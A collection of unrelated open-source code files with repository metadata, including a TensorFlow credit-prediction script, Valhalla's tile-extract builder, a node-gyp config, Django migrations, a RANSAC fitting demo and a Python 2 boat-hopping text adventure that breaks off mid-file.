self.submit_decisions(review_round)
roundreviews.mass_track_change(
ndb.Key(urlsafe=self.session["crrt_conference"]),
self.request.get("tracklist"),
review_round,
"No decision",
"Decline")
def post(self):
review_round = int(self.request.get("review_round"))
if self.request.get("SubmitDecision"):
self.submit_decisions(review_round)
if self.request.get("DeclineNoDecisions"):
self.decline_no_decisions(review_round)
self.redirect("/classic_review_decisions?track=" +
self.request.get("tracklist") +
"&round=" + str(review_round))
| [
"[email protected]"
]
| |
ba7772ef5a0bdda86060a572f050496c9ed99e11 | bc6704ee95819dd8f0547b69c6edf3a4300a7667 | /ML/DeepModel.py | c4603653b531386bc72a7f9f34dd7ca8d68a3123 | []
| no_license | zhangzhenyu13/CreditPredict | 09e25cbcc6ec6742861f781fc09eb49cff02a4db | 26dba961f1c576c4a0158a4ef0bf01d30f79d351 | refs/heads/master | 2021-07-07T22:18:49.043396 | 2017-10-04T13:54:31 | 2017-10-04T13:54:31 | 105,357,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,152 | py | #coding: utf-8
import tensorflow as tf
import time
import xml.dom.minidom as xmlparser
from LoadData.SelectRelativeAttrs import *
from LoadData.StrEncoder import *
from LoadData.fillStrategy import *
#load net structure from file
def readnetStructure(inDim,outDim):
print("netWorks Structure")
w = {}
b = {}
# READ PARAMETERS FROM ANNStructure.XML
dom = xmlparser.parse("..\data\ANNStructure.xml")
ANN = dom.documentElement
prevNum=inDim
nextNum=0
layer=''
i=0
while True:
try:
layer='L'+str(i)
nextNum = eval(ANN.getElementsByTagName(layer)[0].childNodes[0].nodeValue)
w[i]=[prevNum,nextNum]
b[i]=[nextNum]
prevNum=nextNum
print(layer, ":", w[i], b[i])
i = i + 1
except Exception as e:
w[i]=[prevNum,outDim]
b[i]=[outDim]
print(layer, ":", w[i], b[i])
break
return (w,b)
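# Illustrative sketch (an assumption, not taken from this repo): the parser
# above expects ..\data\ANNStructure.xml to hold one hidden-layer width per
# sequentially numbered <Li> tag, e.g.
#
#   <ANN>
#       <L0>64</L0>
#       <L1>32</L1>
#   </ANN>
#
# which would produce weight shapes [inDim, 64], [64, 32] and [32, outDim].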
# deep learning scheme
def multi_perceptron(trainData,validData,testData):
    # extract validation data
xt,yt=validData.getRunTuple2(validData.dataSet)
#def Learning parameters
learnRate = 0.1
batchSize = 100
iterationNum = 1000
inDim=len(xt[0])
outDim=1
#define the Graph
x=tf.placeholder(tf.float32,[None,inDim],name='X_in')
y=tf.placeholder(tf.float32,[None,2],name='Y_out')
#drop out probability
keep_prob=tf.placeholder(tf.float32)
#def hidden layers
w,b=readnetStructure(inDim,outDim)#defNetWork(inDim,outDim,hiddenLayer)
W={}
B={}
H={}
for i in range(len(b)):
W[i]=tf.Variable(tf.truncated_normal(shape=w[i],stddev=0.1))
B[i]= tf.Variable(tf.truncated_normal(shape=b[i],stddev=0.1))
H[0]=tf.nn.relu(tf.matmul((x),W[0])+B[0])
for i in range(1,len(b)-1):
#print(i)
H[i]=tf.nn.elu(tf.matmul(H[i-1],W[i])+B[i])
model=None
if len(b)>=2:
model=tf.nn.relu(tf.matmul(H[len(b)-2],W[len(b)-1])+B[len(b)-1])
else:
model=H[0]
model=tf.nn.dropout(model,keep_prob)
#define error and train goal
#errorLayer=tf.Variable(tf.constant([model,1/(model+0.001)]),trainable=False)
    # balance the importance of true positive and false positive
#errorLayer=tf.matmul(y,model)#care both tp and fp
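    # With one-hot labels, y == [1, 0] (negative) leaves only the first term, so
    # the loss pushes the model output towards 0; y == [0, 1] (positive) leaves
    # 1/(output + 1e-8), pushing the output up -- an asymmetric penalty on the
    # two classes.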
error=tf.slice(y,[0,0],[-1,1])*model+tf.slice(y,[0,1],[-1,1])/(model+1e-8)
loss=tf.reduce_sum(tf.square(error))
train_step=tf.train.AdamOptimizer(learning_rate=learnRate).minimize(loss)
# correctness counter
predict=tf.cast(tf.equal(tf.cast(model>0.5,tf.float32),tf.slice(y,[0,1],[-1,1])),tf.float32)
correctPrediction=tf.reduce_sum(tf.cast(predict,tf.int32))
accuracy=tf.reduce_mean(tf.cast(predict,tf.float32))
#begin train
with tf.Session() as sess:
print("init variables")
init=tf.global_variables_initializer()
#sess=tf.Session()
sess.run(init)
prevtestAcc=0.0
stableCounter=0#count check times for stable status
maxCheck=2#def max check time for stable status
#begin train model
print("running multi-layer perceptrons")
t1 = time.time()
for i in range(iterationNum):
batchX,batchY=trainData.nextXY(batchSize)
if i % 50 == 1:
print("step %d" % (i))
acctest=accuracy.eval(feed_dict={x:xt,y:yt,keep_prob:1.0})
print("test accuracy=%2.2f"%(acctest))
#acctrain = accuracy.eval(feed_dict={x: batchX, y:batchY,keep_prob:1.0})
#print("train accuracy=%2.2f" % (acctrain))
if abs(prevtestAcc-acctest)<0.0001:
stableCounter = stableCounter + 1
if stableCounter>maxCheck:
break
prevtestAcc=acctest
sess.run(train_step, feed_dict={x: batchX, y: batchY, keep_prob: 0.5})
t2=time.time()
print("finished in",t2-t1,"s")
correctNum=sess.run(correctPrediction,feed_dict={x:xt,y:yt,keep_prob:1.0})
print("accuracy is as below with learning rate={} and batchSize={}:".format(learnRate,batchSize))
print(correctNum,validData.dataSize,correctNum/validData.dataSize)
#predict result
#an example
pm=sess.run(model,feed_dict={x:xt,keep_prob:1.0})
pt=sess.run(y,feed_dict={y:yt})
for i in range(len(pt)):
print(pm[i],pt[i])
#label of the testData
if testData is None:
return
result=sess.run(model,feed_dict={x:testData.dataSet,keep_prob:1.0})
        writePrediction(result,testData.IDset)
# write prediction result
def writePrediction(result,IDset):
predict=[]
print(result)
#print(len(result),len(IDset))
for i in range(len(result)):
predict.append([IDset[i],"%2.2f"%result[i][0]])
#print(predict[i])
f=open('../data/submission.csv','w',newline='')
writer = csv.writer(f)
header=['id','predict']
writer.writerow(header)
writer.writerows(predict)
#test
def prePareData():
# testdata
testData = UserTestData('../data/test.csv')
#model train data
mydata=UserTrainData('../data/train.csv')
#preprocessing
StrEncode(getCounters(mydata),mydata.dataSet)
StrEncode(getCounters(testData),testData.dataSet)
rmL=loadRlist()
mydata.dataSet=rmCols(mydata.dataSet,rmL)
testData.dataSet=rmCols(testData.dataSet,rmL)
fillColsMode(mydata.dataSet)
fillColsMode(testData.dataSet)
    # split the data 80/20: 80% to train the model, 20% to validate correctness
ratio=0.8
n=int(len(mydata.dataSet)*ratio)
tdata=mydata.dataSet[n:]
mydata.dataSize=n
mydata.dataSet=mydata.dataSet[0:n]
traindata=mydata
validdata=UserTrainData(tdata)
traindata.initXY2()
validdata.initXY2()
#begin
    print('data prepared: selected attributes (%d), training samples (%d), validation samples (%d)' %
(len(traindata.X[0]),len(traindata.X),len(validdata.X))
)
return (traindata, validdata, testData)
if __name__=="__main__":
traindata, validdata, testData=prePareData()
multi_perceptron(traindata, validdata, testData)
| [
"[email protected]"
]
| |
3940101563b49cd1e017efdcfc68a4f8c102c21f | 1c38baab22de9208565613ea52a468b08111295e | /node_modules/ac-koa/node_modules/ac-node/node_modules/mongodb/node_modules/kerberos/build/config.gypi | efc738040e02514e98dd5eea7ae9a38acbeca620 | [
"Apache-2.0"
]
| permissive | mrschaff/hipchat-translate | 62d4665dd8ffb7249f632e6fa56ea5a0b04014e1 | 0f56a22c4d072fc09317cda30b25de64d5eac997 | refs/heads/master | 2021-01-10T06:48:54.198569 | 2016-04-04T20:45:02 | 2016-04-04T20:45:02 | 54,481,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,753 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 48,
"host_arch": "x64",
"icu_data_file": "icudt55l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt55l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "55",
"node_install_npm": "true",
"node_prefix": "/usr",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/bin/python",
"target_arch": "x64",
"uv_library": "static_library",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "false",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/home/vagrant/project/node_modules/ac-koa/node_modules/ac-node/node_modules/mongodb/node_modules/kerberos/.node-gyp/0.12.12",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"sign_git_tag": "",
"user_agent": "npm/2.14.9 node/v0.12.12 linux x64",
"always_auth": "",
"bin_links": "true",
"key": "",
"description": "true",
"fetch_retries": "2",
"heading": "npm",
"if_present": "",
"init_version": "1.0.0",
"user": "1000",
"force": "",
"cache_min": "10",
"init_license": "ISC",
"editor": "vi",
"rollback": "true",
"tag_version_prefix": "v",
"cache_max": "Infinity",
"userconfig": "/root/.npmrc",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/tmp",
"depth": "Infinity",
"save_dev": "",
"usage": "",
"cafile": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr",
"browser": "",
"cache_lock_wait": "10000",
"registry": "https://registry.npmjs.org/",
"save_optional": "",
"scope": "",
"searchopts": "",
"versions": "",
"cache": "/root/.npm",
"ignore_scripts": "",
"searchsort": "name",
"version": "",
"local_address": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "0022",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"ca": "",
"cert": "",
"global": "",
"link": "",
"access": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "",
"node_version": "0.12.12",
"tag": "latest",
"git_tag_version": "true",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"save_exact": "",
"strict_ssl": "true",
"dev": "",
"globalconfig": "/usr/etc/npmrc",
"init_module": "/root/.npm-init.js",
"parseable": "",
"globalignorefile": "/usr/etc/npmignore",
"cache_lock_retries": "10",
"save_prefix": "^",
"group": "1000",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"json": "",
"spin": "true"
}
}
| [
"[email protected]"
]
| |
3ca0f0f9c4cc6b4dfa80991dd9bbeb1c6b3a23a9 | bb5ddd4543e790a78764af3b775ee23a1842cde2 | /scripts/valhalla_build_extract | 259634bf2522a16d08dd45b38f14db5bb6c57ed0 | [
"MIT"
]
| permissive | molind/valhalla | ee8fcd88eb2b546af8381ab015e25a06063c0847 | 52f869ea2cc192ab31e9d5e75170cab29694059c | refs/heads/master | 2022-09-20T20:38:17.346015 | 2022-09-14T17:48:39 | 2022-09-14T17:48:39 | 84,201,422 | 0 | 0 | null | 2017-03-07T13:20:31 | 2017-03-07T13:20:31 | null | UTF-8 | Python | false | false | 7,488 | #!/usr/bin/env python3
import argparse
import ctypes
from io import BytesIO
import json
import logging
import os
from pathlib import Path
import struct
import sys
import tarfile
from tarfile import BLOCKSIZE
from time import time
from typing import List, Tuple
# "<" prefix means little-endian and no alignment
# order is important! if uint64_t is not first, c++ will use padding bytes to unpack
INDEX_BIN_FORMAT = '<QLL'
INDEX_BIN_SIZE = struct.calcsize(INDEX_BIN_FORMAT)
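# Illustration of the ordering note above: '<' tells Python to pack these
# 16 bytes with no padding, and leading with the uint64_t keeps a naturally
# aligned C++ struct bit-identical. A (uint32, uint64, uint32) order, for
# example, would make the C++ side pad to 8-byte alignment (24 bytes total)
# while Python stayed at 16, so the two would disagree.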
INDEX_FILE = "index.bin"
# skip the first 40 bytes of the tile header
GRAPHTILE_SKIP_BYTES = struct.calcsize('<Q2f16cQ')
TRAFFIC_HEADER_SIZE = struct.calcsize('<2Q4I')
TRAFFIC_SPEED_SIZE = struct.calcsize('<Q')
class TileHeader(ctypes.Structure):
"""
Resembles the uint64_t bit field at bytes 40 - 48 of the
graphtileheader to get the directededgecount_.
"""
_fields_ = [
("nodecount_", ctypes.c_ulonglong, 21),
("directededgecount_", ctypes.c_ulonglong, 21),
("predictedspeeds_count_", ctypes.c_ulonglong, 21),
("spare1_", ctypes.c_ulonglong, 1),
]
description = "Builds a tar extract from the tiles in mjolnir.tile_dir to the path specified in mjolnir.tile_extract."
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-c", "--config", help="Absolute or relative path to the Valhalla config JSON.", type=Path
)
parser.add_argument(
"-i",
"--inline-config",
help="Inline JSON config, will override --config JSON if present",
type=str,
default='{}',
)
parser.add_argument(
"-t", "--with-traffic", help="Flag to add a traffic.tar skeleton", action="store_true", default=False
)
parser.add_argument(
"-v",
"--verbosity",
help="Accumulative verbosity flags; -v: INFO, -vv: DEBUG",
action='count',
default=0,
)
# set up the logger basics
LOGGER = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)5s: %(message)s"))
LOGGER.addHandler(handler)
def get_tile_count(in_path: Path) -> int:
"""Iterates over the full tree and returns the count of all tiles it found."""
count = 0
for _, _, files in os.walk(in_path):
count += len(list(filter(lambda f: f.endswith('.gph'), files)))
return count
def get_tile_id(path: str) -> int:
"""Turns a tile path into a numeric GraphId"""
level, idx = path[:-4].split('/', 1)
return int(level) | (int(idx.replace('/', '')) << 3)
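# Worked example (illustrative values): the tile file "2/000/756/425.gph"
# parses to level 2 and index 756425, giving 2 | (756425 << 3) == 6051402 --
# the low 3 bits hold the hierarchy level, the remaining bits hold the index.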
def get_tar_info(name: str, size: int) -> tarfile.TarInfo:
"""Creates and returns a tarinfo object"""
tarinfo = tarfile.TarInfo(name)
tarinfo.size = size
tarinfo.mtime = int(time())
tarinfo.type = tarfile.REGTYPE
return tarinfo
def write_index_to_tar(tar_fp_: Path):
"""Loop through all tiles and write the correct index.bin file to the tar"""
# get the offset and size from the tarred tile members
index: List[Tuple[int, int, int]] = list()
with tarfile.open(tar_fp_, 'r|') as tar:
for member in tar.getmembers():
if member.name.endswith('.gph'):
LOGGER.debug(
f"Tile {member.name} with offset: {member.offset_data}, size: {member.size}"
)
index.append((member.offset_data, get_tile_id(member.name), member.size))
# write back the actual index info
with open(tar_fp_, 'r+b') as tar:
# jump to the data block, index.bin is the first file
tar.seek(BLOCKSIZE)
for entry in index:
tar.write(struct.pack(INDEX_BIN_FORMAT, *entry))
def create_extracts(config_: dict, do_traffic: bool):
"""Actually creates the tar ball. Break out of main function for testability."""
tiles_fp: Path = Path(config_["mjolnir"].get("tile_dir", '/dev/null'))
extract_fp: Path = Path(
config_["mjolnir"].get("tile_extract") or tiles_fp.parent.joinpath('tiles.tar')
)
traffic_fp: Path = Path(
config_["mjolnir"].get("traffic_extract") or tiles_fp.parent.joinpath('traffic.tar')
)
if not tiles_fp.is_dir():
LOGGER.critical(
f"Directory 'mjolnir.tile_dir': {tiles_fp.resolve()} was not found on the filesystem."
)
sys.exit(1)
tiles_count = get_tile_count(tiles_fp)
if not tiles_count:
LOGGER.critical(f"Directory {tiles_fp} does not contain any usable graph tiles.")
sys.exit(1)
# write the in-memory index file
index_size = INDEX_BIN_SIZE * tiles_count
index_fd = BytesIO(b'0' * index_size)
index_fd.seek(0)
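    # The bytes written here are only placeholders: write_index_to_tar() later
    # reopens the archive, seeks past the first tar header and overwrites this
    # region with the real (offset, tile_id, size) triples, which are not known
    # until every tile has been added.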
# first add the index file, then the sorted tiles to the tarfile
# TODO: come up with a smarter strategy to cluster the tiles in the tar
with tarfile.open(extract_fp, 'w') as tar:
tar.addfile(get_tar_info(INDEX_FILE, index_size), index_fd)
for t in sorted(tiles_fp.rglob('*.gph')):
tar.add(str(t.resolve()), arcname=str(t.relative_to(tiles_fp)))
write_index_to_tar(extract_fp)
LOGGER.info(f"Finished tarring {tiles_count} tiles to {extract_fp}")
# exit if no traffic extract wanted
if not do_traffic:
index_fd.close()
sys.exit(0)
LOGGER.info("Start creating traffic extract...")
# we already have the right size of the index file, simply reset it
index_fd.seek(0)
with tarfile.open(extract_fp) as tar_in, tarfile.open(traffic_fp, 'w') as tar_traffic:
# this will let us do seeks
in_fileobj = tar_in.fileobj
# add the index file as first data
tar_traffic.addfile(get_tar_info(INDEX_FILE, index_size), index_fd)
index_fd.close()
# loop over all routing tiles and create fixed-size traffic tiles
# based on the directed edge count
for tile_in in tar_in.getmembers():
if not tile_in.name.endswith('.gph'):
continue
# jump to the data's offset and skip the uninteresting bytes
in_fileobj.seek(tile_in.offset_data + GRAPHTILE_SKIP_BYTES)
# read the appropriate size of bytes from the tar into the TileHeader struct
tile_header = TileHeader()
b = BytesIO(in_fileobj.read(ctypes.sizeof(TileHeader)))
b.readinto(tile_header)
b.close()
# create the traffic tile
traffic_size = TRAFFIC_HEADER_SIZE + TRAFFIC_SPEED_SIZE * tile_header.directededgecount_
tar_traffic.addfile(get_tar_info(tile_in.name, traffic_size), BytesIO(b'\0' * traffic_size))
LOGGER.debug(f"Tile {tile_in.name} has {tile_header.directededgecount_} directed edges")
write_index_to_tar(traffic_fp)
LOGGER.info(f"Finished creating the traffic extract at {traffic_fp}")
if __name__ == '__main__':
args = parser.parse_args()
if not args.config and not args.inline_config:
LOGGER.critical("No valid config file or inline config used.")
sys.exit(1)
config = dict()
try:
with open(args.config) as f:
config = json.load(f)
except TypeError:
LOGGER.warning("Only inline-config will be used.")
# override with inline-config
config.update(**json.loads(args.inline_config))
# set the right logger level
if args.verbosity == 0:
LOGGER.setLevel(logging.CRITICAL)
elif args.verbosity == 1:
LOGGER.setLevel(logging.INFO)
elif args.verbosity >= 2:
LOGGER.setLevel(logging.DEBUG)
create_extracts(config, args.with_traffic)
| [
"[email protected]"
]
| ||
e340f9127368c9c920a416442cc21904b4e04a23 | 598db6374c25eba964b4c3cc7fc03b3dfdfad92e | /fitting.py | 2ed3493a200dc19c0d37771ebc2487ff27907179 | [
"MIT"
]
| permissive | yyuuliang/toolbox | 3e8a83464495ceab05c4bc1821b65a6cddf00205 | 9da907fd1a73c3694e5b4fcfb052fc3d5fb1fc42 | refs/heads/master | 2020-06-28T04:29:20.026980 | 2019-08-08T01:09:56 | 2019-08-08T01:09:56 | 200,143,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py |
import numpy as np
from matplotlib import pyplot as plt
from sklearn import linear_model, datasets
n_samples = 10
n_outliers = 3
X, y, coef = datasets.make_regression(n_samples=n_samples, n_features=1,
n_informative=1, noise=10,
coef=True, random_state=0)
# Add outlier data
np.random.seed(0)
X[:n_outliers] = 3 + 0.5 * np.random.normal(size=(n_outliers, 1))
y[:n_outliers] = -3 + 10 * np.random.normal(size=n_outliers)
# Fit line using all data
lr = linear_model.LinearRegression()
lr.fit(X, y)
# Robustly fit linear model with RANSAC algorithm
ransac = linear_model.RANSACRegressor()
ransac.fit(X, y)
inlier_mask = ransac.inlier_mask_
outlier_mask = np.logical_not(inlier_mask)
# Polyfit using numpy
npcoef = np.polyfit(X.reshape([10,]),y,deg=3)
npcube = np.poly1d(npcoef)
# Predict data of estimated models
line_X = np.arange(X.min(), X.max())[:, np.newaxis]
line_y = lr.predict(line_X)
line_y_ransac = ransac.predict(line_X)
line_y_np = npcube(line_X)
# Compare estimated coefficients
print("Estimated coefficients (true, linear regression, RANSAC):")
print(coef, lr.coef_, ransac.estimator_.coef_)
lw = 2
plt.scatter(X[inlier_mask], y[inlier_mask], color='yellowgreen', marker='.',
label='Inliers')
plt.scatter(X[outlier_mask], y[outlier_mask], color='gold', marker='.',
label='Outliers')
plt.plot(line_X, line_y_np, color='navy', linewidth=lw, label='Cubic fit (np.polyfit)')
plt.plot(line_X, line_y_ransac, color='cornflowerblue', linewidth=lw,
label='RANSAC regressor')
plt.legend(loc='lower right')
plt.xlabel("Input")
plt.ylabel("Response")
plt.show()
| [
"[email protected]"
]
| |
dd458bd298118cd4b80b586051dd3b742d78573a | 9f2eb69625bd0204f2e7d39b56592c92afe5e07b | /photos/migrations/0001_initial.py | 2c41e42421a2c744469a9ed886ba1d026feb09e9 | []
| no_license | Cris123m/machtecBeta | f8b426a0f996b189a8595ef179639facf77c0056 | 7c01653d5876c34974e0e8b6beb8e93da86604c8 | refs/heads/master | 2020-09-06T23:11:45.904167 | 2020-03-09T00:22:45 | 2020-03-09T00:22:45 | 220,584,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | # Generated by Django 2.2.6 on 2019-11-08 23:32
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Título')),
('content', ckeditor.fields.RichTextField(verbose_name='Contenido')),
('photo', models.ImageField(blank=True, null=True, upload_to='carousel', verbose_name='Foto')),
('order', models.SmallIntegerField(default=0, verbose_name='Orden')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Fecha de creación')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Fecha de edición')),
],
options={
'verbose_name': 'foto',
'verbose_name_plural': 'fotos',
'ordering': ['order', 'title'],
},
),
]
| [
"[email protected]"
]
| |
5694f828530a430b4aca5569f67e50d0baf88575 | aff694b019806db8f8cd66fd205f9049351bb10c | /bin/wheel | e54d9f83eb92ea97085a22f82f854bd08e745464 | []
| no_license | mikilabarda/my-first-blog | 3885d08f87e9c3f05da7000b9e60d29f3895efd3 | 7e1476fa75e6db95bfe8685ad43a233777166071 | refs/heads/master | 2021-05-30T19:25:38.022284 | 2016-03-20T05:31:16 | 2016-03-20T05:31:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | #!/Users/Miki/Desktop/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
e3399daf37f287b2f7c0b62e55f30e6611bf5d97 | 0f89043a9e7caac53bc76cd359d704d5cfaef3db | /main/migrations/0044_remove_tag_resources.py | eaef56cf0970beb2e07945c8e6a10d9b814acaf4 | []
| no_license | sirodoht/knowhub | f704d987f6c800717c2dba7b811d05b0d85801fd | 4c242a9f1bc14a11fbf799119b19d79c4201ba2d | refs/heads/master | 2022-03-05T15:28:55.539951 | 2019-11-18T18:33:42 | 2019-11-18T18:33:42 | 134,064,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | # Generated by Django 2.1 on 2018-08-27 13:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("main", "0043_auto_20180826_0050")]
operations = [migrations.RemoveField(model_name="tag", name="resources")]
| [
"[email protected]"
]
| |
49314760024407a296f238dd33047174c356b49e | 30447f52275d988d57ab224ae5e70919ce4f7cad | /game.py | 89729dc928baef50512b9ee824f38145af01f68c | [
"MIT"
]
| permissive | EMCain/boats-game | d452698f8293e2fb4560f25e6c1193e41be0d751 | 98d7f68ab53d0fdb7c5f8ea38b1ff76f6f701ff9 | refs/heads/master | 2021-01-10T19:31:59.606871 | 2015-07-23T21:33:53 | 2015-07-23T21:33:53 | 39,591,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,709 | py | # This is a text based game that involves moving between interconnected boats.
# It's basically a trading sequence game; you're talking to characters to determine what they want, so you can help them and they can give you something you need to continue. It's my first Python program. I hope you like it!
# This game was written in 2015 by Emily Cain (github.com/EMCain; emcain.net)
# Protected by Attribution-ShareAlike 4.0 International, see https://creativecommons.org/licenses/by-sa/4.0/ for details.
# Attribution - You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
# ShareAlike - If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original.
# No additional restrictions - You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.
import random
# a function to validate input when you need an integer. This prevents type input errors from crashing the program.
def validate_int(input):
need_input = True
while need_input:
try:
output = int(input)
need_input = False
except ValueError:
print "please enter a valid number with no decimal points"
input = raw_input("> ")
continue
return output
# A similar function to validate strings
def validate_str(input):
need_input = True
while need_input:
try:
output = str(input)
need_input = False
except ValueError:
print "please enter a valid string."
input = raw_input("> ")
continue
return output
#defines the Boat object which is the basis for location in this game
class Boat(object):
#inputs are place (the boat's position), cons (a dictionary of connecting boat numbers : the conditions to move to those boats) style (the boat's type, for flavor), and character (the person who is on the boat; None by default.)
def __init__(self, place, cons, style, character = None):
self.connections = {}
for key in cons: # transfer the key-value pairs in the dictionary "cons" to the internal (self) dictionary "connections"
self.connections[key] = cons[key]
self.position = validate_int(place) # self's position is the input int called place
self.kind = validate_str(style) # self's kind is the input string called style
self.person = character
def get_person(self): # used when a string describing the person is needed. Npc has a custom __str__method so you can use it this way.
if self.person is not None:
return self.person
else:
self.blank_things = ["dust bunny", "mouse", "pile of old boxes"] # the idea is that if no one is on the boat you see some random junk.
return random.choice(self.blank_things)
# the Player class handles most of your actions in the game. The Map class handles most of the background stuff that needs to happen.
class Player(object):
def __init__(self):
self.the_map = Map()
self.location = 0 # your current position; the number refers to a boat.
def see_connected_boats(self):
print "You can move to the following places."
        current_boat = self.the_map.boats[self.location]  # the boat object at the player's current location in the map's boats list
for connection in current_boat.connections:
print connection, ":", self.the_map.boats[connection].kind
def on_boat_actions(self): # this must be run in a loop for the game to work.
self.the_boat = self.the_map.boats[self.location]
raw_input("Continue >> ") # exists simply to slow down the flow of text. Otherwise it gets overwhelming.
print "\n"
print "You are on " + self.the_boat.kind + "."
self.the_person = self.the_boat.get_person() # the person (Npc) who's on the boat
print "You see a", str(self.the_person) + ".\n" # will show some random junk like 'pile of old boxes' if there's no person
print "What do you want to do?"
print "1. talk to the", self.the_person
print "2. move to a different boat"
action = validate_int(raw_input(" > ")) # ensures input is an integer and asks for new input if it's not
self.input_needed = True
while self.input_needed:
if action == 1:
try:
self.the_boat.person.interact() # starts a conversation with the person
except:
print "That's an odd choice.\n" # this happens if you try to talk to the inanimate object that's displayed if there's no person.
self.input_needed = False
elif action == 2:
self.move_to_boat()
self.input_needed = False
else:
print "please enter 1 or 2, then press ENTER or RETURN"
action = validate_int(raw_input(" > ")) # asks for new input and returns to the top of this while loop
continue
# performs various tests to see if moving is possible, moves if possible, if not tells you why. Tests if the move causes you to win, and if so ends game
def move_to_boat(self):
self.the_boat = self.the_map.boats[self.location] # creates the_boat attribute (if needed) and assigns it the boat you're on
self.see_connected_boats()
print "Where do you want to go?"
move_to = validate_int(raw_input("> "))
if move_to in self.the_boat.connections: # tests if the requested boat is connected to your current one
# gets the MoveCondition object associated with your current boat and the one you want to move to
self.the_condition = self.the_boat.connections[move_to]
# next uses the MoveCondition object to determine if you have done the in-game task needed to make this move.
if self.the_condition.fulfilled:
self.location = move_to
self.the_boat = self.the_map.boats[self.location]
print "\nYou cross a narrow rope bridge.\n"
if self.location == self.the_map.win_boat: # tests if the most recent move has moved you to the winning boat.
print "Congratulations, you have reached the last boat!\n"
print "~~~~~~~~~~~~~~~~~~~~You win!~~~~~~~~~~~~~~~~~~~~\n"
print "< ('o'<) ( '-' ) (>^o^)> v( ^.' )v < (' .' )> < ('.'<) ( '.^ ) (>^.^)> v( 0.0 )v < (' .' )>\n" # does a little dance
exit(1)
else:
print "You can't move to this boat yet, because", str(self.the_condition.success_no) # if a MoveCondition prevents you from moving to this boat, this happens to explain why.
else:
print "Sorry, you cannot move to Boat Number", move_to, "because it is not connected to this boat."
# MoveCondition objects are the basis of this game's logic system. They determine whether you can take actions or not.
# If there's no restriction on an action, use the default MoveCondition object with no parameters, which I have called below as always_yes.
# success_question is a question you're trying to answer with this MoveCondition.
# success_no describes what happens if the answer is no; success_yes describes what happens if the answer is yes.
# All 3 parameters are strings and only matter for story purposes; they don't affect how the object functions.
class MoveCondition(object):
def __init__(self, success_question = None, success_no = None, success_yes = None):
self.success_question = ""
self.success_no = ""
self.success_yes = ""
if success_question is None and success_no is None and success_yes is None: #default object
self.fulfilled = True
else:
self.success_question = validate_str(success_question)
self.success_no = validate_str(success_no)
self.success_yes = validate_str(success_yes)
self.fulfilled = False
# I suppose it would make sense to have variations on this to make it unfulfilled or the opposite of whatever it is currently,
# but I don't use them in this game so I haven't added them.
def make_fulfilled(self):
self.fulfilled = True
def __str__(self):
return self.success_question
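# Minimal usage sketch (illustrative; the real wiring happens in MoveHandler
# and Map below):
#
#   has_cookie = MoveCondition("Do you have a cookie?",
#                              "you don't have a cookie.",
#                              "You have a cookie.")
#   has_cookie.fulfilled        # False: any bridge gated on it stays closed
#   has_cookie.make_fulfilled()
#   has_cookie.fulfilled        # True: Player.move_to_boat() now permits the move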
#all this does is create move conditions and store them in a list.
# The move conditions will be used in a dictionary where they are paired with connections between boats.
class MoveHandler(object):
conditions = {}
def __init__(self):
# a stand-in move condition that starts out true
always_yes = MoveCondition()
self.conditions["AlwaysYes"] = always_yes
baby_crying = MoveCondition("Is the baby happy?", "the baby's dad is blocking the way, and won't move until she stops crying.", "The baby is happy.")
self.conditions["BabyCrying"] = baby_crying
has_cookie = MoveCondition("Do you have a cookie?", "you don't have a cookie.", "You have a cookie.")
